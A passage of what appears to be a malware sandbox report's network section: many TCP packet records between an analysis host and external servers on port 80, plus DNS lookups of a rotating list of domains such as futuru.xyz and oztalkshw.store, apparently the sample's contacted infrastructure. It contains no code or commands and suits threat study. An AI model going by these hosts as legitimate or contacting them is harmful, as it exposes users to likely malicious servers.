                                                                                      Nov 25, 2024 13:58:48.156452894 CET804976137.140.192.206192.168.2.8
                                                                                      Nov 25, 2024 13:58:48.156544924 CET804976137.140.192.206192.168.2.8
                                                                                      Nov 25, 2024 13:58:48.156864882 CET4976180192.168.2.837.140.192.206
                                                                                      Nov 25, 2024 13:58:48.159691095 CET804976137.140.192.206192.168.2.8
                                                                                      Nov 25, 2024 13:58:48.159832001 CET804976137.140.192.206192.168.2.8
                                                                                      Nov 25, 2024 13:58:48.160079956 CET4976180192.168.2.837.140.192.206
                                                                                      Nov 25, 2024 13:58:48.163000107 CET804976137.140.192.206192.168.2.8
                                                                                      Nov 25, 2024 13:58:48.163273096 CET4976180192.168.2.837.140.192.206
                                                                                      Nov 25, 2024 13:58:48.163346052 CET804976137.140.192.206192.168.2.8
                                                                                      Nov 25, 2024 13:58:48.166333914 CET804976137.140.192.206192.168.2.8
                                                                                      Nov 25, 2024 13:58:48.166544914 CET804976137.140.192.206192.168.2.8
                                                                                      Nov 25, 2024 13:58:48.166722059 CET4976180192.168.2.837.140.192.206
                                                                                      Nov 25, 2024 13:58:48.169548035 CET804976137.140.192.206192.168.2.8
                                                                                      Nov 25, 2024 13:58:48.169650078 CET804976137.140.192.206192.168.2.8
                                                                                      Nov 25, 2024 13:58:48.169970036 CET4976180192.168.2.837.140.192.206
                                                                                      Nov 25, 2024 13:58:48.172835112 CET804976137.140.192.206192.168.2.8
                                                                                      Nov 25, 2024 13:58:48.172952890 CET804976137.140.192.206192.168.2.8
                                                                                      Nov 25, 2024 13:58:48.173459053 CET4976180192.168.2.837.140.192.206
                                                                                      Nov 25, 2024 13:58:48.176127911 CET804976137.140.192.206192.168.2.8
                                                                                      Nov 25, 2024 13:58:48.176254034 CET804976137.140.192.206192.168.2.8
                                                                                      Nov 25, 2024 13:58:48.176645994 CET4976180192.168.2.837.140.192.206
                                                                                      Nov 25, 2024 13:58:48.179461956 CET804976137.140.192.206192.168.2.8
                                                                                      Nov 25, 2024 13:58:48.179577112 CET804976137.140.192.206192.168.2.8
                                                                                      Nov 25, 2024 13:58:48.182791948 CET804976137.140.192.206192.168.2.8
                                                                                      Nov 25, 2024 13:58:48.182917118 CET804976137.140.192.206192.168.2.8
                                                                                      Nov 25, 2024 13:58:48.183021069 CET4976180192.168.2.837.140.192.206
                                                                                      Nov 25, 2024 13:58:48.183176041 CET4976180192.168.2.837.140.192.206
                                                                                      Nov 25, 2024 13:58:48.185977936 CET804976137.140.192.206192.168.2.8
                                                                                      Nov 25, 2024 13:58:48.186098099 CET804976137.140.192.206192.168.2.8
                                                                                      Nov 25, 2024 13:58:48.186203957 CET4976180192.168.2.837.140.192.206
                                                                                      Nov 25, 2024 13:58:48.189290047 CET804976137.140.192.206192.168.2.8
                                                                                      Nov 25, 2024 13:58:48.189460993 CET804976137.140.192.206192.168.2.8
                                                                                      Nov 25, 2024 13:58:48.189485073 CET4976180192.168.2.837.140.192.206
                                                                                      Nov 25, 2024 13:58:48.192620039 CET804976137.140.192.206192.168.2.8
                                                                                      Nov 25, 2024 13:58:48.192750931 CET804976137.140.192.206192.168.2.8
                                                                                      Nov 25, 2024 13:58:48.192866087 CET4976180192.168.2.837.140.192.206
                                                                                      Nov 25, 2024 13:58:48.195960045 CET804976137.140.192.206192.168.2.8
                                                                                      Nov 25, 2024 13:58:48.196083069 CET804976137.140.192.206192.168.2.8
                                                                                      Nov 25, 2024 13:58:48.197019100 CET4976180192.168.2.837.140.192.206
                                                                                      Nov 25, 2024 13:58:48.199069023 CET804976137.140.192.206192.168.2.8
                                                                                      Nov 25, 2024 13:58:48.199187040 CET804976137.140.192.206192.168.2.8
                                                                                      Nov 25, 2024 13:58:48.199505091 CET4976180192.168.2.837.140.192.206
                                                                                      Nov 25, 2024 13:58:48.202373028 CET804976137.140.192.206192.168.2.8
                                                                                      Nov 25, 2024 13:58:48.202490091 CET804976137.140.192.206192.168.2.8
                                                                                      Nov 25, 2024 13:58:48.202718019 CET4976180192.168.2.837.140.192.206
                                                                                      Nov 25, 2024 13:58:48.205704927 CET804976137.140.192.206192.168.2.8
                                                                                      Nov 25, 2024 13:58:48.205821037 CET804976137.140.192.206192.168.2.8
                                                                                      Nov 25, 2024 13:58:48.206021070 CET4976180192.168.2.837.140.192.206
                                                                                      Nov 25, 2024 13:58:48.208946943 CET804976137.140.192.206192.168.2.8
                                                                                      Nov 25, 2024 13:58:48.209067106 CET804976137.140.192.206192.168.2.8
                                                                                      Nov 25, 2024 13:58:48.209189892 CET4976180192.168.2.837.140.192.206
                                                                                      Nov 25, 2024 13:58:48.212223053 CET804976137.140.192.206192.168.2.8
                                                                                      Nov 25, 2024 13:58:48.212403059 CET804976137.140.192.206192.168.2.8
                                                                                      Nov 25, 2024 13:58:48.212563992 CET4976180192.168.2.837.140.192.206
                                                                                      Nov 25, 2024 13:58:48.215557098 CET804976137.140.192.206192.168.2.8
                                                                                      Nov 25, 2024 13:58:48.215609074 CET804976137.140.192.206192.168.2.8
                                                                                      Nov 25, 2024 13:58:48.216018915 CET4976180192.168.2.837.140.192.206
                                                                                      Nov 25, 2024 13:58:48.218782902 CET804976137.140.192.206192.168.2.8
                                                                                      Nov 25, 2024 13:58:48.218894005 CET4976180192.168.2.837.140.192.206
                                                                                      Nov 25, 2024 13:58:48.218903065 CET804976137.140.192.206192.168.2.8
                                                                                      Nov 25, 2024 13:58:48.222115993 CET804976137.140.192.206192.168.2.8
                                                                                      Nov 25, 2024 13:58:48.222188950 CET804976137.140.192.206192.168.2.8
                                                                                      Nov 25, 2024 13:58:48.222671986 CET4976180192.168.2.837.140.192.206
                                                                                      Nov 25, 2024 13:58:48.225370884 CET804976137.140.192.206192.168.2.8
                                                                                      Nov 25, 2024 13:58:48.225483894 CET804976137.140.192.206192.168.2.8
                                                                                      Nov 25, 2024 13:58:48.225862026 CET4976180192.168.2.837.140.192.206
                                                                                      Nov 25, 2024 13:58:48.228701115 CET804976137.140.192.206192.168.2.8
                                                                                      Nov 25, 2024 13:58:48.228800058 CET804976137.140.192.206192.168.2.8
                                                                                      Nov 25, 2024 13:58:48.228864908 CET4976180192.168.2.837.140.192.206
                                                                                      Nov 25, 2024 13:58:48.231944084 CET804976137.140.192.206192.168.2.8
                                                                                      Nov 25, 2024 13:58:48.232065916 CET804976137.140.192.206192.168.2.8
                                                                                      Nov 25, 2024 13:58:48.232249975 CET4976180192.168.2.837.140.192.206
                                                                                      Nov 25, 2024 13:58:48.235240936 CET804976137.140.192.206192.168.2.8
                                                                                      Nov 25, 2024 13:58:48.235369921 CET804976137.140.192.206192.168.2.8
                                                                                      Nov 25, 2024 13:58:48.235589027 CET4976180192.168.2.837.140.192.206
                                                                                      Nov 25, 2024 13:58:48.238667011 CET804976137.140.192.206192.168.2.8
                                                                                      Nov 25, 2024 13:58:48.238805056 CET804976137.140.192.206192.168.2.8
                                                                                      Nov 25, 2024 13:58:48.238867044 CET4976180192.168.2.837.140.192.206
                                                                                      Nov 25, 2024 13:58:48.241930962 CET804976137.140.192.206192.168.2.8
                                                                                      Nov 25, 2024 13:58:48.245718002 CET4976180192.168.2.837.140.192.206
                                                                                      Nov 25, 2024 13:58:48.307303905 CET804976137.140.192.206192.168.2.8
                                                                                      Nov 25, 2024 13:58:48.307394981 CET804976137.140.192.206192.168.2.8
                                                                                      Nov 25, 2024 13:58:48.307934999 CET4976180192.168.2.837.140.192.206
                                                                                      Nov 25, 2024 13:58:48.308547974 CET804976137.140.192.206192.168.2.8
                                                                                      Nov 25, 2024 13:58:48.308657885 CET804976137.140.192.206192.168.2.8
                                                                                      Nov 25, 2024 13:58:48.308762074 CET4976180192.168.2.837.140.192.206
                                                                                      Nov 25, 2024 13:58:48.310910940 CET804976137.140.192.206192.168.2.8
                                                                                      Nov 25, 2024 13:58:48.311019897 CET804976137.140.192.206192.168.2.8
                                                                                      Nov 25, 2024 13:58:48.311278105 CET4976180192.168.2.837.140.192.206
                                                                                      Nov 25, 2024 13:58:48.313313007 CET804976137.140.192.206192.168.2.8
                                                                                      Nov 25, 2024 13:58:48.313421011 CET804976137.140.192.206192.168.2.8
                                                                                      Nov 25, 2024 13:58:48.313606024 CET4976180192.168.2.837.140.192.206
                                                                                      Nov 25, 2024 13:58:48.315792084 CET804976137.140.192.206192.168.2.8
                                                                                      Nov 25, 2024 13:58:48.315856934 CET804976137.140.192.206192.168.2.8
                                                                                      Nov 25, 2024 13:58:48.316358089 CET4976180192.168.2.837.140.192.206
                                                                                      Nov 25, 2024 13:58:48.318079948 CET804976137.140.192.206192.168.2.8
                                                                                      Nov 25, 2024 13:58:48.318198919 CET804976137.140.192.206192.168.2.8
                                                                                      Nov 25, 2024 13:58:48.318742990 CET4976180192.168.2.837.140.192.206
                                                                                      Nov 25, 2024 13:58:48.320415974 CET804976137.140.192.206192.168.2.8
                                                                                      Nov 25, 2024 13:58:48.320585966 CET804976137.140.192.206192.168.2.8
                                                                                      Nov 25, 2024 13:58:48.320864916 CET4976180192.168.2.837.140.192.206
                                                                                      Nov 25, 2024 13:58:48.322856903 CET804976137.140.192.206192.168.2.8
                                                                                      Nov 25, 2024 13:58:48.322983027 CET804976137.140.192.206192.168.2.8
                                                                                      Nov 25, 2024 13:58:48.323193073 CET4976180192.168.2.837.140.192.206
                                                                                      Nov 25, 2024 13:58:48.324984074 CET804976137.140.192.206192.168.2.8
                                                                                      Nov 25, 2024 13:58:48.325151920 CET804976137.140.192.206192.168.2.8
                                                                                      Nov 25, 2024 13:58:48.326863050 CET4976180192.168.2.837.140.192.206
                                                                                      Nov 25, 2024 13:58:48.327198029 CET804976137.140.192.206192.168.2.8
                                                                                      Nov 25, 2024 13:58:48.327301979 CET804976137.140.192.206192.168.2.8
                                                                                      Nov 25, 2024 13:58:48.327459097 CET4976180192.168.2.837.140.192.206
                                                                                      Nov 25, 2024 13:58:48.329401970 CET804976137.140.192.206192.168.2.8
                                                                                      Nov 25, 2024 13:58:48.329514980 CET804976137.140.192.206192.168.2.8
                                                                                      Nov 25, 2024 13:58:48.329642057 CET4976180192.168.2.837.140.192.206
                                                                                      Nov 25, 2024 13:58:48.331621885 CET804976137.140.192.206192.168.2.8
                                                                                      Nov 25, 2024 13:58:48.331742048 CET804976137.140.192.206192.168.2.8
                                                                                      Nov 25, 2024 13:58:48.333772898 CET804976137.140.192.206192.168.2.8
                                                                                      Nov 25, 2024 13:58:48.333878040 CET804976137.140.192.206192.168.2.8
                                                                                      Nov 25, 2024 13:58:48.334017992 CET4976180192.168.2.837.140.192.206
                                                                                      Nov 25, 2024 13:58:48.334017992 CET4976180192.168.2.837.140.192.206
                                                                                      Nov 25, 2024 13:58:48.336168051 CET804976137.140.192.206192.168.2.8
                                                                                      Nov 25, 2024 13:58:48.336213112 CET804976137.140.192.206192.168.2.8
                                                                                      Nov 25, 2024 13:58:48.336292028 CET4976180192.168.2.837.140.192.206
                                                                                      Nov 25, 2024 13:58:48.338104010 CET804976137.140.192.206192.168.2.8
                                                                                      Nov 25, 2024 13:58:48.338310957 CET804976137.140.192.206192.168.2.8
                                                                                      Nov 25, 2024 13:58:48.340186119 CET804976137.140.192.206192.168.2.8
                                                                                      Nov 25, 2024 13:58:48.340301991 CET804976137.140.192.206192.168.2.8
                                                                                      Nov 25, 2024 13:58:48.340457916 CET4976180192.168.2.837.140.192.206
                                                                                      Nov 25, 2024 13:58:48.342223883 CET804976137.140.192.206192.168.2.8
                                                                                      Nov 25, 2024 13:58:48.342334032 CET804976137.140.192.206192.168.2.8
                                                                                      Nov 25, 2024 13:58:48.344120026 CET4976180192.168.2.837.140.192.206
                                                                                      Nov 25, 2024 13:58:48.344397068 CET804976137.140.192.206192.168.2.8
                                                                                      Nov 25, 2024 13:58:48.344469070 CET804976137.140.192.206192.168.2.8
                                                                                      Nov 25, 2024 13:58:48.344710112 CET4976180192.168.2.837.140.192.206
                                                                                      Nov 25, 2024 13:58:48.346379995 CET804976137.140.192.206192.168.2.8
                                                                                      Nov 25, 2024 13:58:48.346482038 CET804976137.140.192.206192.168.2.8
                                                                                      Nov 25, 2024 13:58:48.346767902 CET4976180192.168.2.837.140.192.206
                                                                                      Nov 25, 2024 13:58:48.348722935 CET804976137.140.192.206192.168.2.8
                                                                                      Nov 25, 2024 13:58:48.348730087 CET804976137.140.192.206192.168.2.8
                                                                                      Nov 25, 2024 13:58:48.348788977 CET4976180192.168.2.837.140.192.206
                                                                                      Nov 25, 2024 13:58:48.350620985 CET804976137.140.192.206192.168.2.8
                                                                                      Nov 25, 2024 13:58:48.350763083 CET804976137.140.192.206192.168.2.8
                                                                                      Nov 25, 2024 13:58:48.352453947 CET804976137.140.192.206192.168.2.8
                                                                                      Nov 25, 2024 13:58:48.352583885 CET804976137.140.192.206192.168.2.8
                                                                                      Nov 25, 2024 13:58:48.353650093 CET4976180192.168.2.837.140.192.206
                                                                                      Nov 25, 2024 13:58:48.353650093 CET4976180192.168.2.837.140.192.206
                                                                                      Nov 25, 2024 13:58:48.354466915 CET804976137.140.192.206192.168.2.8
                                                                                      Nov 25, 2024 13:58:48.354579926 CET804976137.140.192.206192.168.2.8
                                                                                      Nov 25, 2024 13:58:48.354777098 CET4976180192.168.2.837.140.192.206
                                                                                      Nov 25, 2024 13:58:48.356448889 CET804976137.140.192.206192.168.2.8
                                                                                      Nov 25, 2024 13:58:48.356564045 CET804976137.140.192.206192.168.2.8
                                                                                      Nov 25, 2024 13:58:48.357153893 CET4976180192.168.2.837.140.192.206
                                                                                      Nov 25, 2024 13:58:48.358413935 CET804976137.140.192.206192.168.2.8
                                                                                      Nov 25, 2024 13:58:48.358535051 CET804976137.140.192.206192.168.2.8
                                                                                      Nov 25, 2024 13:58:48.358692884 CET4976180192.168.2.837.140.192.206
                                                                                      Nov 25, 2024 13:58:48.360354900 CET804976137.140.192.206192.168.2.8
                                                                                      Nov 25, 2024 13:58:48.360466957 CET804976137.140.192.206192.168.2.8
                                                                                      Nov 25, 2024 13:58:48.360582113 CET4976180192.168.2.837.140.192.206
                                                                                      Nov 25, 2024 13:58:48.361839056 CET804976137.140.192.206192.168.2.8
                                                                                      Nov 25, 2024 13:58:48.361964941 CET804976137.140.192.206192.168.2.8
                                                                                      Nov 25, 2024 13:58:48.362246037 CET4976180192.168.2.837.140.192.206
                                                                                      Nov 25, 2024 13:58:48.362700939 CET804976137.140.192.206192.168.2.8
                                                                                      Nov 25, 2024 13:58:48.362812042 CET804976137.140.192.206192.168.2.8
                                                                                      Nov 25, 2024 13:58:48.363894939 CET804976137.140.192.206192.168.2.8
                                                                                      Nov 25, 2024 13:58:48.363976955 CET804976137.140.192.206192.168.2.8
                                                                                      Nov 25, 2024 13:58:48.364047050 CET4976180192.168.2.837.140.192.206
                                                                                      Nov 25, 2024 13:58:48.365086079 CET804976137.140.192.206192.168.2.8
                                                                                      Nov 25, 2024 13:58:48.365156889 CET804976137.140.192.206192.168.2.8
                                                                                      Nov 25, 2024 13:58:48.365917921 CET4976180192.168.2.837.140.192.206
                                                                                      Nov 25, 2024 13:58:48.366429090 CET804976137.140.192.206192.168.2.8
                                                                                      Nov 25, 2024 13:58:48.366528988 CET804976137.140.192.206192.168.2.8
                                                                                      Nov 25, 2024 13:58:48.366985083 CET4976180192.168.2.837.140.192.206
                                                                                      Nov 25, 2024 13:58:48.367547035 CET804976137.140.192.206192.168.2.8
                                                                                      Nov 25, 2024 13:58:48.367671967 CET804976137.140.192.206192.168.2.8
                                                                                      Nov 25, 2024 13:58:48.368699074 CET804976137.140.192.206192.168.2.8
                                                                                      Nov 25, 2024 13:58:48.368774891 CET804976137.140.192.206192.168.2.8
                                                                                      Nov 25, 2024 13:58:48.368940115 CET4976180192.168.2.837.140.192.206
                                                                                      Nov 25, 2024 13:58:48.369702101 CET804976137.140.192.206192.168.2.8
                                                                                      Nov 25, 2024 13:58:48.369812012 CET804976137.140.192.206192.168.2.8
                                                                                      Nov 25, 2024 13:58:48.370243073 CET4976180192.168.2.837.140.192.206
                                                                                      Nov 25, 2024 13:58:48.370901108 CET804976137.140.192.206192.168.2.8
                                                                                      Nov 25, 2024 13:58:48.371017933 CET804976137.140.192.206192.168.2.8
                                                                                      Nov 25, 2024 13:58:48.372052908 CET804976137.140.192.206192.168.2.8
                                                                                      Nov 25, 2024 13:58:48.372221947 CET804976137.140.192.206192.168.2.8
                                                                                      Nov 25, 2024 13:58:48.372272015 CET4976180192.168.2.837.140.192.206
                                                                                      Nov 25, 2024 13:58:48.373035908 CET4976180192.168.2.837.140.192.206
                                                                                      Nov 25, 2024 13:58:48.373337030 CET804976137.140.192.206192.168.2.8
                                                                                      Nov 25, 2024 13:58:48.373456955 CET804976137.140.192.206192.168.2.8
                                                                                      Nov 25, 2024 13:58:48.373732090 CET4976180192.168.2.837.140.192.206
                                                                                      Nov 25, 2024 13:58:48.374386072 CET804976137.140.192.206192.168.2.8
                                                                                      Nov 25, 2024 13:58:48.374510050 CET804976137.140.192.206192.168.2.8
                                                                                      Nov 25, 2024 13:58:48.374706030 CET4976180192.168.2.837.140.192.206
                                                                                      Nov 25, 2024 13:58:48.375591040 CET804976137.140.192.206192.168.2.8
                                                                                      Nov 25, 2024 13:58:48.375684023 CET804976137.140.192.206192.168.2.8
                                                                                      Nov 25, 2024 13:58:48.375864983 CET4976180192.168.2.837.140.192.206
                                                                                      Nov 25, 2024 13:58:48.376740932 CET804976137.140.192.206192.168.2.8
                                                                                      Nov 25, 2024 13:58:48.376863956 CET804976137.140.192.206192.168.2.8
                                                                                      Nov 25, 2024 13:58:48.377101898 CET4976180192.168.2.837.140.192.206
                                                                                      Nov 25, 2024 13:58:48.377931118 CET804976137.140.192.206192.168.2.8
                                                                                      Nov 25, 2024 13:58:48.378000021 CET804976137.140.192.206192.168.2.8
                                                                                      Nov 25, 2024 13:58:48.378267050 CET4976180192.168.2.837.140.192.206
                                                                                      Nov 25, 2024 13:58:48.379076958 CET804976137.140.192.206192.168.2.8
                                                                                      Nov 25, 2024 13:58:48.379179001 CET804976137.140.192.206192.168.2.8
                                                                                      Nov 25, 2024 13:58:48.380270958 CET804976137.140.192.206192.168.2.8
                                                                                      Nov 25, 2024 13:58:48.380404949 CET4976180192.168.2.837.140.192.206
                                                                                      Nov 25, 2024 13:58:48.380405903 CET804976137.140.192.206192.168.2.8
                                                                                      Nov 25, 2024 13:58:48.381463051 CET804976137.140.192.206192.168.2.8
                                                                                      Nov 25, 2024 13:58:48.381544113 CET804976137.140.192.206192.168.2.8
                                                                                      Nov 25, 2024 13:58:48.381721020 CET4976180192.168.2.837.140.192.206
                                                                                      Nov 25, 2024 13:58:48.382592916 CET804976137.140.192.206192.168.2.8
                                                                                      Nov 25, 2024 13:58:48.382714987 CET804976137.140.192.206192.168.2.8
                                                                                      Nov 25, 2024 13:58:48.383491039 CET4976180192.168.2.837.140.192.206
                                                                                      Nov 25, 2024 13:58:48.383835077 CET804976137.140.192.206192.168.2.8
                                                                                      Nov 25, 2024 13:58:48.386678934 CET4976180192.168.2.837.140.192.206
                                                                                      Nov 25, 2024 13:58:48.390115976 CET4976180192.168.2.837.140.192.206
                                                                                      Nov 25, 2024 13:58:48.510035038 CET804976137.140.192.206192.168.2.8
                                                                                      Nov 25, 2024 13:58:54.156981945 CET4976280192.168.2.8199.59.243.227
                                                                                      Nov 25, 2024 13:58:54.276909113 CET8049762199.59.243.227192.168.2.8
                                                                                      Nov 25, 2024 13:58:54.277059078 CET4976280192.168.2.8199.59.243.227
                                                                                      Nov 25, 2024 13:58:54.294629097 CET4976280192.168.2.8199.59.243.227
                                                                                      Nov 25, 2024 13:58:54.415258884 CET8049762199.59.243.227192.168.2.8
                                                                                      Nov 25, 2024 13:58:55.373055935 CET8049762199.59.243.227192.168.2.8
                                                                                      Nov 25, 2024 13:58:55.373173952 CET8049762199.59.243.227192.168.2.8
                                                                                      Nov 25, 2024 13:58:55.373189926 CET8049762199.59.243.227192.168.2.8
                                                                                      Nov 25, 2024 13:58:55.373234987 CET4976280192.168.2.8199.59.243.227
                                                                                      Nov 25, 2024 13:58:55.373279095 CET4976280192.168.2.8199.59.243.227
                                                                                      Nov 25, 2024 13:58:55.804229975 CET4976280192.168.2.8199.59.243.227
                                                                                      Nov 25, 2024 13:58:56.823729038 CET4976380192.168.2.8199.59.243.227
                                                                                      Nov 25, 2024 13:58:57.147275925 CET8049763199.59.243.227192.168.2.8
                                                                                      Nov 25, 2024 13:58:57.147347927 CET4976380192.168.2.8199.59.243.227
                                                                                      Nov 25, 2024 13:58:57.165107965 CET4976380192.168.2.8199.59.243.227
                                                                                      Nov 25, 2024 13:58:57.287353992 CET8049763199.59.243.227192.168.2.8
                                                                                      Nov 25, 2024 13:58:58.413799047 CET8049763199.59.243.227192.168.2.8
                                                                                      Nov 25, 2024 13:58:58.413882017 CET8049763199.59.243.227192.168.2.8
                                                                                      Nov 25, 2024 13:58:58.413894892 CET8049763199.59.243.227192.168.2.8
                                                                                      Nov 25, 2024 13:58:58.414027929 CET4976380192.168.2.8199.59.243.227
                                                                                      Nov 25, 2024 13:58:58.682780027 CET4976380192.168.2.8199.59.243.227
                                                                                      Nov 25, 2024 13:58:59.699266911 CET4976480192.168.2.8199.59.243.227
                                                                                      Nov 25, 2024 13:58:59.819329023 CET8049764199.59.243.227192.168.2.8
                                                                                      Nov 25, 2024 13:58:59.819464922 CET4976480192.168.2.8199.59.243.227
                                                                                      Nov 25, 2024 13:58:59.836966991 CET4976480192.168.2.8199.59.243.227
                                                                                      Nov 25, 2024 13:58:59.957015991 CET8049764199.59.243.227192.168.2.8
                                                                                      Nov 25, 2024 13:58:59.957052946 CET8049764199.59.243.227192.168.2.8
                                                                                      Nov 25, 2024 13:59:00.945743084 CET8049764199.59.243.227192.168.2.8
                                                                                      Nov 25, 2024 13:59:00.945884943 CET8049764199.59.243.227192.168.2.8
                                                                                      Nov 25, 2024 13:59:00.945892096 CET8049764199.59.243.227192.168.2.8
                                                                                      Nov 25, 2024 13:59:00.945944071 CET4976480192.168.2.8199.59.243.227
                                                                                      Nov 25, 2024 13:59:01.352386951 CET4976480192.168.2.8199.59.243.227
                                                                                      Nov 25, 2024 13:59:02.370229959 CET4976580192.168.2.8199.59.243.227
                                                                                      Nov 25, 2024 13:59:02.490266085 CET8049765199.59.243.227192.168.2.8
                                                                                      Nov 25, 2024 13:59:02.490493059 CET4976580192.168.2.8199.59.243.227
                                                                                      Nov 25, 2024 13:59:02.500936985 CET4976580192.168.2.8199.59.243.227
                                                                                      Nov 25, 2024 13:59:02.621038914 CET8049765199.59.243.227192.168.2.8
                                                                                      Nov 25, 2024 13:59:03.636507988 CET8049765199.59.243.227192.168.2.8
                                                                                      Nov 25, 2024 13:59:03.636657000 CET8049765199.59.243.227192.168.2.8
                                                                                      Nov 25, 2024 13:59:03.636709929 CET8049765199.59.243.227192.168.2.8
                                                                                      Nov 25, 2024 13:59:03.636766911 CET4976580192.168.2.8199.59.243.227
                                                                                      Nov 25, 2024 13:59:03.636810064 CET4976580192.168.2.8199.59.243.227
                                                                                      Nov 25, 2024 13:59:03.639975071 CET4976580192.168.2.8199.59.243.227
                                                                                      Nov 25, 2024 13:59:03.759918928 CET8049765199.59.243.227192.168.2.8

                                                                                      UDP Packets

                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                      Nov 25, 2024 13:55:47.220005035 CET6167453192.168.2.81.1.1.1
                                                                                      Nov 25, 2024 13:55:47.668225050 CET53616741.1.1.1192.168.2.8
                                                                                      Nov 25, 2024 13:56:04.120399952 CET5706953192.168.2.81.1.1.1
                                                                                      Nov 25, 2024 13:56:04.639970064 CET53570691.1.1.1192.168.2.8
                                                                                      Nov 25, 2024 13:56:19.292790890 CET6060353192.168.2.81.1.1.1
                                                                                      Nov 25, 2024 13:56:19.772711992 CET53606031.1.1.1192.168.2.8
                                                                                      Nov 25, 2024 13:56:34.214071035 CET5094253192.168.2.81.1.1.1
                                                                                      Nov 25, 2024 13:56:34.758579016 CET53509421.1.1.1192.168.2.8
                                                                                      Nov 25, 2024 13:56:49.496428967 CET5984553192.168.2.81.1.1.1
                                                                                      Nov 25, 2024 13:56:50.270437002 CET53598451.1.1.1192.168.2.8
                                                                                      Nov 25, 2024 13:57:04.987432957 CET5690053192.168.2.81.1.1.1
                                                                                      Nov 25, 2024 13:57:05.975975990 CET5690053192.168.2.81.1.1.1
                                                                                      Nov 25, 2024 13:57:06.669470072 CET53569001.1.1.1192.168.2.8
                                                                                      Nov 25, 2024 13:57:06.669481993 CET53569001.1.1.1192.168.2.8
                                                                                      Nov 25, 2024 13:57:21.527584076 CET6452553192.168.2.81.1.1.1
                                                                                      Nov 25, 2024 13:57:22.162269115 CET53645251.1.1.1192.168.2.8
                                                                                      Nov 25, 2024 13:57:37.418610096 CET5481453192.168.2.81.1.1.1
                                                                                      Nov 25, 2024 13:57:37.905720949 CET53548141.1.1.1192.168.2.8
                                                                                      Nov 25, 2024 13:57:52.433253050 CET6434653192.168.2.81.1.1.1
                                                                                      Nov 25, 2024 13:57:52.943248034 CET53643461.1.1.1192.168.2.8
                                                                                      Nov 25, 2024 13:58:07.263576031 CET6543753192.168.2.81.1.1.1
                                                                                      Nov 25, 2024 13:58:07.727294922 CET53654371.1.1.1192.168.2.8
                                                                                      Nov 25, 2024 13:58:22.281451941 CET5964253192.168.2.81.1.1.1
                                                                                      Nov 25, 2024 13:58:22.935209990 CET53596421.1.1.1192.168.2.8
                                                                                      Nov 25, 2024 13:58:37.480484962 CET4944453192.168.2.81.1.1.1
                                                                                      Nov 25, 2024 13:58:37.968969107 CET53494441.1.1.1192.168.2.8
                                                                                      Nov 25, 2024 13:58:53.402499914 CET6538053192.168.2.81.1.1.1
                                                                                      Nov 25, 2024 13:58:54.153487921 CET53653801.1.1.1192.168.2.8
                                                                                      Nov 25, 2024 13:59:10.137074947 CET5524053192.168.2.81.1.1.1
                                                                                      Nov 25, 2024 13:59:10.661498070 CET53552401.1.1.1192.168.2.8

                                                                                      DNS Queries

                                                                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                      Nov 25, 2024 13:55:47.220005035 CET192.168.2.81.1.1.10x8530Standard query (0)www.bioland.appA (IP address)IN (0x0001)false
                                                                                      Nov 25, 2024 13:56:04.120399952 CET192.168.2.81.1.1.10xb85aStandard query (0)www.kkpmoneysocial.topA (IP address)IN (0x0001)false
                                                                                      Nov 25, 2024 13:56:19.292790890 CET192.168.2.81.1.1.10x4e0cStandard query (0)www.futuru.xyzA (IP address)IN (0x0001)false
                                                                                      Nov 25, 2024 13:56:34.214071035 CET192.168.2.81.1.1.10xc0deStandard query (0)www.yhj12.oneA (IP address)IN (0x0001)false
                                                                                      Nov 25, 2024 13:56:49.496428967 CET192.168.2.81.1.1.10xd8e8Standard query (0)www.officinadelpasso.shopA (IP address)IN (0x0001)false
                                                                                      Nov 25, 2024 13:57:04.987432957 CET192.168.2.81.1.1.10xa69bStandard query (0)www.sankan-fukushi.infoA (IP address)IN (0x0001)false
                                                                                      Nov 25, 2024 13:57:05.975975990 CET192.168.2.81.1.1.10xa69bStandard query (0)www.sankan-fukushi.infoA (IP address)IN (0x0001)false
                                                                                      Nov 25, 2024 13:57:21.527584076 CET192.168.2.81.1.1.10x2fe6Standard query (0)www.zxyck.netA (IP address)IN (0x0001)false
                                                                                      Nov 25, 2024 13:57:37.418610096 CET192.168.2.81.1.1.10x4ce8Standard query (0)www.krshop.shopA (IP address)IN (0x0001)false
                                                                                      Nov 25, 2024 13:57:52.433253050 CET192.168.2.81.1.1.10x5c0bStandard query (0)www.samundri.onlineA (IP address)IN (0x0001)false
                                                                                      Nov 25, 2024 13:58:07.263576031 CET192.168.2.81.1.1.10xac1cStandard query (0)www.supernutra01.onlineA (IP address)IN (0x0001)false
                                                                                      Nov 25, 2024 13:58:22.281451941 CET192.168.2.81.1.1.10x4bf2Standard query (0)www.callyur.shopA (IP address)IN (0x0001)false
                                                                                      Nov 25, 2024 13:58:37.480484962 CET192.168.2.81.1.1.10x139fStandard query (0)www.iner-tech.onlineA (IP address)IN (0x0001)false
                                                                                      Nov 25, 2024 13:58:53.402499914 CET192.168.2.81.1.1.10xefadStandard query (0)www.oztalkshw.storeA (IP address)IN (0x0001)false
                                                                                      Nov 25, 2024 13:59:10.137074947 CET192.168.2.81.1.1.10x8498Standard query (0)www.fantastica.digitalA (IP address)IN (0x0001)false

                                                                                      DNS Answers

                                                                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                      Nov 25, 2024 13:55:47.668225050 CET1.1.1.1192.168.2.80x8530No error (0)www.bioland.app202.61.233.66A (IP address)IN (0x0001)false
                                                                                      Nov 25, 2024 13:56:04.639970064 CET1.1.1.1192.168.2.80xb85aNo error (0)www.kkpmoneysocial.top172.67.129.38A (IP address)IN (0x0001)false
                                                                                      Nov 25, 2024 13:56:04.639970064 CET1.1.1.1192.168.2.80xb85aNo error (0)www.kkpmoneysocial.top104.21.1.106A (IP address)IN (0x0001)false
                                                                                      Nov 25, 2024 13:56:19.772711992 CET1.1.1.1192.168.2.80x4e0cNo error (0)www.futuru.xyz209.74.77.109A (IP address)IN (0x0001)false
                                                                                      Nov 25, 2024 13:56:34.758579016 CET1.1.1.1192.168.2.80xc0deNo error (0)www.yhj12.one38.181.21.85A (IP address)IN (0x0001)false
                                                                                      Nov 25, 2024 13:56:50.270437002 CET1.1.1.1192.168.2.80xd8e8No error (0)www.officinadelpasso.shopofficinadelpasso.shopCNAME (Canonical name)IN (0x0001)false
                                                                                      Nov 25, 2024 13:56:50.270437002 CET1.1.1.1192.168.2.80xd8e8No error (0)officinadelpasso.shop195.110.124.133A (IP address)IN (0x0001)false
